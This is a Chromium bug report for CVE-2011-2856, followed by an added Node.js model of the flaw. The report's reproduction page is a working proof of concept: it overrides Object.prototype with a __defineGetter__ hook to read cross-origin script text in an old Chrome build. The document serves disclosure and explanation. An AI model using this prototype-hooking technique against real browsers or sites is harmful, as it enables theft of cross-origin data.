CVE-2011-2856

Arbitrary cross-origin bypass using __defineGetter__ prototype override

Aug 18 2011

VULNERABILITY DETAILS

You can access cross-origin text by hooking into __defineGetter__ and using the SourceLocation object.

REPRODUCTION CASE

<html>

<head>

  <script type="text/javascript">
    Object.prototype.__defineGetter__("line", function() {
      alert(this.script.sourceSlice().sourceText());
    });
  </script>

  <script src="http://google.com"></script>

</head>

<body></body>

</html>

VERSION

Chrome Version: [15.0.854.0] + [dev]

Operating System: [Win, 7, Service pack 1]

Link: https://bugs.chromium.org/p/chromium/issues/detail?id=93416
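
Added example, not part of the original report or Chromium's code: a simplified Node.js model of the pattern the reproduction case relies on, where a read of `line` on an object that has no `line` property of its own falls through to a getter on `Object.prototype` and hands the object to that getter as `this`. The names `builders`, `readLine` and `leakedThrough` and the sample secret are constructed for illustration; the model does not reproduce V8's internals or its actual fix.

```javascript
// Constructed stand-in for data that privileged code holds but page script
// must never see (hypothetical; not V8's real SourceLocation).
const SECRET = "cross-origin text (constructed)";
const script = { sourceText: () => SECRET };

// Three ways privileged code might build the record it later reads .line from.
const builders = {
  // No own "line": the read falls through to Object.prototype.
  inherited: () => ({ script }),
  // Own data property created by the literal; it shadows the prototype.
  ownProperty: () => ({ script, line: 1 }),
  // No prototype chain at all, so there is nothing to hook.
  nullPrototype: () => Object.assign(Object.create(null), { script }),
};

// The privileged read that the hook targets.
function readLine(loc) {
  return loc.line;
}

// Installs a getter like the one in the report, performs the privileged read,
// removes the hook, and returns whatever the getter captured through `this`.
function leakedThrough(build) {
  const captured = [];
  Object.prototype.__defineGetter__("line", function () {
    if (this.script) captured.push(this.script.sourceText());
  });
  try {
    readLine(build());
  } finally {
    delete Object.prototype.line; // restore the shared prototype
  }
  return captured;
}

// Runs every builder and reports what leaked for each.
function summarize() {
  const out = {};
  for (const name of Object.keys(builders)) {
    out[name] = leakedThrough(builders[name]);
  }
  return out;
}

console.log(summarize());
```

Only the `inherited` record leaks; the other two never consult `Object.prototype` for `line`, so the page-installed getter is never called with the privileged object as `this`.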